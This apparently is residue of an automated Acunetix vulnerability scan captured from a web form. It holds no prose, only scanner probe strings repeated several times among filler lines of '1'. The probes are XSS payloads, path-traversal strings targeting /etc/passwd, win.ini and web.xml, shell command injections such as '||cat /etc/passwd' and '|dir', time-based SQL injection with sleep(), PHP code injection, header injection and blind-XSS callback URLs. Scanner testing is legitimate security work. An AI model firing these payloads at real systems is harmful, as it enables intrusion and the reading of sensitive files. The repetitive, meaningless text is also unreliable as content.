
1<input autofocus onfocus=prompt(941947)>

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

'

"|"ld

1

<a href='http://www.acunetix.com'>website security</a>

1

vy7Rd6NK')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

/etc/passwd

1

"

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

mSVbbk9S'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

'

1

1

1_7xYjs <ScRiPt >prompt(937137)</ScRiPt>

-1

http://hitpP5zmDjRKT.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"

acunetix_wvs_invalid_filename

1

-1)

1

1

1

1

1

comments

||cat /etc/passwd

1

-1))

................etc/passwd

1

http://www.acunetix.tst

1'"()&%<ScRiPt >prompt(965806)</ScRiPt>

comments

1

1

'"

uq1t8u31'

&dir

'"()&%<ScRiPt >prompt(972481)</ScRiPt>

1

comments/.

1

'&dir&'

1

<!--

pSeHnZo6')

file:///etc/passwd

1_911650

1

1

1

"&dir&"

1

AiFCLAlk'))

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

|dir

1

acu4387<s1﹥s2ʺs3ʹuca4387

1

1

'|dir

1

WEB-INF/web.xml

1

"|dir

acux9107z1z2abcxuca9107

1

1

WEB-INF\web.xml

1

1

1<ScRiPt >prompt(938193)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

1

1<script>prompt(923344)</script>

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(909733)</ScRiPt>

1

1

1

windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?923627></ScRiPt>

1

1

1

1<ScRiPt >prompt(908782)</ScRiPt>

................windowswin.ini

1

1<video><source onerror="javascript:prompt(935003)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(948323)"></g></svg>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<div style=width:expression(prompt(951648))>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<iframe src='data:text/html

response.write(9818514*9753942)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

'+response.write(9818514*9753942)+'

1<body onload=prompt(910264)>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9818514*9753942)+"

&cat /etc/passwd&

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(972754)>

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(928987)>

1

"&cat /etc/passwd&"

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

WEB-INF\web.xml

1<img/src=">" onerror=alert(941771)>

../../../../../../../../../../etc/passwd.jpg

1

cat /etc/passwd

1

${100264+99903}

1

-1

1<ScRiPt%20>prompt(994221)</sCripT>

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&lt

1

|cat /etc/passwd#

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n906903=v939936

)

-1))

1some_inexistent_file_with_long_name%00.jpg

<img acu onmouseover=prompt(947526) //>

1

'|'ld

1

1

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

rfe2hbKZ'

1<input autofocus onfocus=prompt(976206)>

'"()

1

"|"ld

1

testasp.vulnweb.com

^(#$!@#$)(()))******

iEZzCq9k')

1

.\./.\./.\./.\./.\./.\./etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

'

1

1

eSBAR2UR'))

1

[url=http://www.acunetix.com]website security[/url]

/etc/passwd

1

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

-1

1

1_ngVTM <ScRiPt >prompt(997870)</ScRiPt>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

"

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

1

-1))

http://hitoT0Yr3RRdh.bxss.me/

................etc/passwd

||cat /etc/passwd

1

1

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

IPsHahHP'

1

&dir

1

1

1

1

1

comments

http://www.acunetix.tst

CQ9WDc2S')

1

file:///etc/passwd

'&dir&'

'"

1

comments/.

1'"()&%<ScRiPt >prompt(965155)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

oR4wzgtc'))

1

1

"&dir&"

<!--

1

'"()&%<ScRiPt >prompt(939061)</ScRiPt>

WEB-INF/web.xml

1

1

|dir

1

1

1

1_956771

WEB-INF\web.xml

1

'|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

acu4214<s1﹥s2ʺs3ʹuca4214

../../../../../../../../../../boot.ini

1

1

acux9126z1z2abcxuca9126

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(923175)</ScRiPt>

1

1

1

1

1<script>prompt(932598)</script>

windowswin.ini

1

1

1

1<ScRiPt >prompt(982373)</ScRiPt>

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915386></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(998232)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(936781)">

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(988268)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<div style=width:expression(prompt(981788))>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9078245*9047854)

1<iframe src='data:text/html

1

1

1

1<body onload=prompt(974276)>

'+response.write(9078245*9047854)+'

WEB-INF/web.xml

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(906088)>

1

1

"+response.write(9078245*9047854)+"

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1<img src=xyz OnErRor=prompt(911256)>

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

"&cat /etc/passwd&"

1<img/src=">" onerror=alert(939047)>

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<ScRiPt%20>prompt(991168)</sCripT>

1

1

cat /etc/passwd

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&lt

1

-1

${100203+99385}

1

`cat /etc/passwd`

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

<img acu onmouseover=prompt(919400) //>

1

-1)

1&n904913=v915025

1

|cat /etc/passwd#

)

1some_inexistent_file_with_long_name%00.jpg

1

1<input autofocus onfocus=prompt(984787)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1))

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

<a href='http://www.acunetix.com'>website security</a>

1

zNMrCalL'

.\./.\./.\./.\./.\./.\./etc/passwd

'"()

^(#$!@#$)(()))******

testasp.vulnweb.com

"|"ld

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

nugd8esZ')

'

/etc/passwd

1

1

1_XLRl3 <ScRiPt >prompt(963864)</ScRiPt>

1

1

1

"

c3A5XZxH'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

'

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

-1)

"

1

1

http://hityoryw29LpO.bxss.me/

1

1

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

................etc/passwd

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

1

1

http://www.acunetix.tst

1

1

A49WWhic'

&dir

1

'"

comments

1'"()&%<ScRiPt >prompt(997469)</ScRiPt>

1

sw6lvNEI')

file:///etc/passwd

'&dir&'

1

comments

<!--

'"()&%<ScRiPt >prompt(911997)</ScRiPt>

pscdq3pL'))

1

/\../\../\../\../\../\../\../etc/passwd

1

1

comments/.

1_966556

1

"&dir&"

1

1

1

1

WEB-INF/web.xml

1

|dir

1

1

WEB-INF\web.xml

1

1

'|dir

acu3617<s1﹥s2ʺs3ʹuca3617

1

1

../../../../../../../../../../windows/win.ini

acux2643z1z2abcxuca2643

"|dir

1

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(921688)</ScRiPt>

1

1

1

1

1<script>prompt(906630)</script>

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(957254)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?963490></ScRiPt>

windowswin.ini

1

1

1

1

................windowswin.ini

1<ScRiPt >prompt(956843)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<video><source onerror="javascript:prompt(975814)">

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(932308)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(951521))>

1

1

1

1<iframe src='data:text/html

response.write(9931704*9017036)

1

1

WEB-INF/web.xml

&cat /etc/passwd&

1<body onload=prompt(907046)>

'+response.write(9931704*9017036)+'

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(930902)>

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

"+response.write(9931704*9017036)+"

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(6.312),0)/*'XOR(if(now()=sysdate(),sleep(6.312),0))OR'"XOR(if(now()=sysdate(),sleep(6.312),0))OR"*/

1<img src=xyz OnErRor=prompt(955673)>

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(6.312)))v)/*'+(select(0)from(select(sleep(6.312)))v)+'"+(select(0)from(select(sleep(6.312)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1<img/src=">" onerror=alert(949756)>

1

1

1

1

1

-1

1

${99153+100276}

../../../../../../../../../../etc/passwd.jpg

1<ScRiPt%20>prompt(953119)</sCripT>

`cat /etc/passwd`

1

1

1

1

-1)

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1&lt

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n949654=v986743

1

1

1

-1))

1

1some_inexistent_file_with_long_name%00.jpg

<img acu onmouseover=prompt(917189) //>

'|'ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

fNYBXP5g'

1

1<input autofocus onfocus=prompt(925070)>

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

!(()&&!|*|*|

'"()

1

1

VFXmCkee')

<a href='http://www.acunetix.com'>website security</a>

^(#$!@#$)(()))******

.\./.\./.\./.\./.\./.\./etc/passwd

1

'

[url=http://www.acunetix.com]website security[/url]

1

oBPQkuZq'))

1

1

1

/etc/passwd

1

"

1_anxZq <ScRiPt >prompt(964245)</ScRiPt>

'

1

-1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

1

||cat /etc/passwd

-1))

................etc/passwd

http://hitrqx6JRjDB2.bxss.me/

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

xOeNLeBR'

1

&dir

1

acunetix_wvs_invalid_filename

1

1

1

http://www.acunetix.tst

ixERQkPD')

file:///etc/passwd

1'"()&%<ScRiPt >prompt(924845)</ScRiPt>

comments

'"

'&dir&'

TexHb5JG'))

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(964759)</ScRiPt>

1

comments

<!--

1

"&dir&"

1_947856

WEB-INF/web.xml

1

1

comments/.

1

|dir

1

1

1

WEB-INF\web.xml

1

1

'|dir

../../../../../../../../../../windows/win.ini

1

1

acu5110<s1﹥s2ʺs3ʹuca5110

1

1

"|dir

../../../../../../../../../../boot.ini

1

acux4732z1z2abcxuca4732

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(930393)</ScRiPt>

1

1

1

1

windowswin.ini

1<script>prompt(925916)</script>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(934127)</ScRiPt>

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?914202></ScRiPt>

1

1

1

1<ScRiPt >prompt(947295)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(988076)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(939329)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<div style=width:expression(prompt(951581))>

1

1<iframe src='data:text/html

WEB-INF/web.xml

1

1

response.write(9330110*9197930)

1<body onload=prompt(900811)>

1

1

1

WEB-INF\web.xml

&cat /etc/passwd&

'+response.write(9330110*9197930)+'

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(904369)>

'&cat /etc/passwd&'

"+response.write(9330110*9197930)+"

1

1

1<img src=xyz OnErRor=prompt(913553)>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

1

1<img/src=">" onerror=alert(932009)>

if(now()=sysdate(),sleep(3.5),0)/*'XOR(if(now()=sysdate(),sleep(3.5),0))OR'"XOR(if(now()=sysdate(),sleep(3.5),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1<ScRiPt%20>prompt(973333)</sCripT>

1

1

(select(0)from(select(sleep(3.5)))v)/*'+(select(0)from(select(sleep(3.5)))v)+'"+(select(0)from(select(sleep(3.5)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1&lt

${99529+100228}

-1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n938592=v999123

1

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

<img acu onmouseover=prompt(960919) //>

1

-1)

1

1

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

1

1<input autofocus onfocus=prompt(904316)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

-1))

<a href='http://www.acunetix.com'>website security</a>

1

"|"ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

[url=http://www.acunetix.com]website security[/url]

ufBjf9av'

testasp.vulnweb.com

1

'"()

1

^(#$!@#$)(()))******

1_XzytX <ScRiPt >prompt(969687)</ScRiPt>

b71xDhF8')

.\./.\./.\./.\./.\./.\./etc/passwd

'

1

1

1

'

1

1

1

1

uGY7sZcy'))

"

/etc/passwd

1

1

"

-1

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

||cat /etc/passwd

-1)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

-1))

http://hitdDpUPlBV2Q.bxss.me/

1

................etc/passwd

comments

http://www.acunetix.tst

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

'&dir&'

1

YIzAeVpF'

comments

1

1

1

1

'"

dA99QE5S')

1

"&dir&"

comments/.

file:///etc/passwd

1'"()&%<ScRiPt >prompt(943259)</ScRiPt>

<!--

1

1

IPH55WiB'))

|dir

1

/\../\../\../\../\../\../\../etc/passwd

'"()&%<ScRiPt >prompt(998114)</ScRiPt>

1

1

'|dir

1

1

WEB-INF/web.xml

1_966205

1

1

WEB-INF\web.xml

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

acu6843<s1﹥s2ʺs3ʹuca6843

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux10167z1z2abcxuca10167

1

1

windowswin.ini

1

1

1<ScRiPt >prompt(973719)</ScRiPt>

1

1

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(982282)</script>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<ScRiPt >prompt(978665)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?985168></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(952442)</ScRiPt>

response.write(9571911*9828615)

1

1

1

&cat /etc/passwd&

1<video><source onerror="javascript:prompt(976341)">

'+response.write(9571911*9828615)+'

WEB-INF/web.xml

1

1

'&cat /etc/passwd&'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(979593)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

"+response.write(9571911*9828615)+"

1

1

WEB-INF\web.xml

1

1<div style=width:expression(prompt(941921))>

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1<iframe src='data:text/html

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1

${100042+100216}

1<body onload=prompt(958519)>

1

1

1

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(953897)>

1

'|'ld

1

1

1some_inexistent_file_with_long_name%00.jpg

1&n964199=v932804

1

-1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

)

1<img src=xyz OnErRor=prompt(992689)>

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1)

1

testasp.vulnweb.com

!(()&&!|*|*|

1<img/src=">" onerror=alert(970393)>

1

.\./.\./.\./.\./.\./.\./etc/passwd

-1))

'"()

^(#$!@#$)(()))******

1

1

1<ScRiPt%20>prompt(964546)</sCripT>

1

'

'

1

hVcUCnnP'

1

1

/etc/passwd

1&lt

1

1

"

TN5WErDq')

1

"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

<img acu onmouseover=prompt(954567) //>

${@print(md5(acunetix_wvs_security_test))}

1

1

L9hK4Iyf'))

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<input autofocus onfocus=prompt(946139)>

${@print(md5(acunetix_wvs_security_test))}\

1

-1

http://hitPm9j9ohp6j.bxss.me/

1

1

1

&dir

................etc/passwd

<a href='http://www.acunetix.com'>website security</a>

acunetix_wvs_invalid_filename

-1)

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

comments

[url=http://www.acunetix.com]website security[/url]

-1))

'&dir&'

'"

1

1

1

comments

dt9Nv67D'

1_rYc0V <ScRiPt >prompt(934212)</ScRiPt>

file:///etc/passwd

"&dir&"

1

<!--

1'"()&%<ScRiPt >prompt(944255)</ScRiPt>

1

comments/.

1

05BKAJNT')

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

'"()&%<ScRiPt >prompt(996331)</ScRiPt>

|dir

1

1

1

iebu8zZj'))

WEB-INF/web.xml

1

1

1_948021

1

'|dir

1

1

1

1

WEB-INF\web.xml

"|dir

1

1

acu2638<s1﹥s2ʺs3ʹuca2638

../../../../../../../../../../windows/win.ini

1

1

1

1

1

acux6865z1z2abcxuca6865

../../../../../../../../../../boot.ini

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(984315)</ScRiPt>

1

1

1<script>prompt(938506)</script>

1

windowswin.ini

1

1

1<ScRiPt >prompt(931871)</ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?987397></ScRiPt>

1

1

1

1<ScRiPt >prompt(963160)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<video><source onerror="javascript:prompt(945961)">

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(954184)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<div style=width:expression(prompt(954398))>

1

1

response.write(9330965*9738733)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<iframe src='data:text/html

1

&cat /etc/passwd&

'+response.write(9330965*9738733)+'

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(997834)>

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(945653)>

"+response.write(9330965*9738733)+"

1

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1<img src=xyz OnErRor=prompt(950062)>

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

WEB-INF\web.xml

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(994751)>

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1<ScRiPt%20>prompt(944649)</sCripT>

`cat /etc/passwd`

1

1

1

1

1

-1

1&lt

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

${100461+99722}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

<img acu onmouseover=prompt(931361) //>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

1

1

1&n994227=v955192

)

1some_inexistent_file_with_long_name%00.jpg

-1))

1<input autofocus onfocus=prompt(976621)>

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

ugI23IKf'

<a href='http://www.acunetix.com'>website security</a>

'"()

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

^(#$!@#$)(()))******

testasp.vulnweb.com

'

[url=http://www.acunetix.com]website security[/url]

3kfS1KGj')

1

1

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

1

"

VPZE8fkl'))

1_2pmsb <ScRiPt >prompt(918473)</ScRiPt>

1

1

"

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

-1

||cat /etc/passwd

1

1

http://hitoj37JJ2VJM.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

&dir

1

1

acunetix_wvs_invalid_filename

1

1

1

................etc/passwd

-1))

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

http://www.acunetix.tst

'"

vCgtMB9T'

1

"&dir&"

1

1'"()&%<ScRiPt >prompt(980527)</ScRiPt>

comments

file:///etc/passwd

1

xvhBZagk')

<!--

1

|dir

'"()&%<ScRiPt >prompt(939277)</ScRiPt>

JTYwlq7K'))

comments/.

/\../\../\../\../\../\../\../etc/passwd

1

1

'|dir

1

1_982583

1

WEB-INF/web.xml

1

1

1

"|dir

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acu1659<s1﹥s2ʺs3ʹuca1659

1

1

../../../../../../../../../../boot.ini

1

1

acux7154z1z2abcxuca7154

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(989936)</ScRiPt>

1

windowswin.ini

1

1

1<script>prompt(921013)</script>

1

1

1<ScRiPt >prompt(995027)</ScRiPt>

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?957894></ScRiPt>

1

1

1<ScRiPt >prompt(931620)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(939710)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(954698)"></g></svg>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<div style=width:expression(prompt(935600))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<iframe src='data:text/html

1

1

response.write(9734028*9566319)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<body onload=prompt(907222)>

1

1

'+response.write(9734028*9566319)+'

&cat /etc/passwd&

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(990699)>

1

1

1

"+response.write(9734028*9566319)+"

WEB-INF\web.xml

1<img src=xyz OnErRor=prompt(915128)>

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

1

1

1

../../../../../../../../../../etc/passwd

1<img/src=">" onerror=alert(993094)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<ScRiPt%20>prompt(944007)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

